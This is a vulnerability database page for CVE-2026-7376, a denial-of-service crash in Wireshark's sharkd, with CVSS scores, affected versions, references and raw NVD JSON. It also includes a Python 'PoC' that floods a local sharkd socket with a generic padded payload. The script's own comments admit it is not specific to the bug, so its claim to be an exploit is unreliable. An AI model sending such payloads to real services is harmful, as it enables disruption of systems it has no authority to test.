Security Vulnerability Report
中文
CVE-2026-7376 CVSS 5.5 MEDIUM

CVE-2026-7376

Published: 2026-04-30 06:16:17
Last Modified: 2026-05-06 16:16:12

Description

Crash in sharkd 4.6.0 to 4.6.4 and 4.4.0 to 4.4.14 allows denial of service

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:wireshark:wireshark:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:wireshark:wireshark:*:*:*:*:*:*:*:* - VULNERABLE
Wireshark 4.4.0 - 4.4.14
Wireshark 4.6.0 - 4.6.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import socket # PoC for CVE-2026-7376: Wireshark sharkd Denial of Service # This script demonstrates a potential trigger for the crash by sending malformed data to sharkd. # Note: Actual exploitation requires specific malformed packets based on the vulnerability details. def send_malicious_packet(host='127.0.0.1', port=44444): try: # Create a socket connection to the local sharkd service client = socket.socket(socket.AF_INET, socket.SOCK_STREAM) client.connect((host, port)) # Construct a payload that simulates the triggering condition # This is a generic fuzzing payload; specific bytes depend on the dissection bug. payload = b"\x00\x00\x00\x01" + b"A" * 10000 print(f"[*] Sending payload to {host}:{port}...") client.send(payload) # Wait for response or timeout indicating crash client.settimeout(2) response = client.recv(1024) print(f"[+] Received response: {response}") except socket.timeout: print("[-] Connection timed out. Service may have crashed.") except ConnectionRefusedError: print("[-] Connection refused. Ensure sharkd is running.") except Exception as e: print(f"[!] An error occurred: {e}") finally: client.close() if __name__ == "__main__": send_malicious_packet()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-7376", "sourceIdentifier": "[email protected]", "published": "2026-04-30T06:16:17.053", "lastModified": "2026-05-06T16:16:12.250", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Crash in sharkd 4.6.0 to 4.6.4 and 4.4.0 to 4.4.14 allows denial of service"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wireshark:wireshark:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.4.0", "versionEndExcluding": "4.4.15", "matchCriteriaId": "8EAFFA8A-B5D8-4784-851E-E1B682871495"}, {"vulnerable": true, "criteria": "cpe:2.3:a:wireshark:wireshark:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.6.0", "versionEndExcluding": "4.6.5", "matchCriteriaId": "1D804272-AD4D-4454-9629-1BBAA825D7C4"}]}]}], "references": [{"url": "https://gitlab.com/wireshark/wireshark/-/work_items/21206", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://www.wireshark.org/security/wnpa-sec-2026-48.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://gitlab.com/wireshark/wireshark/-/work_items/21206", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}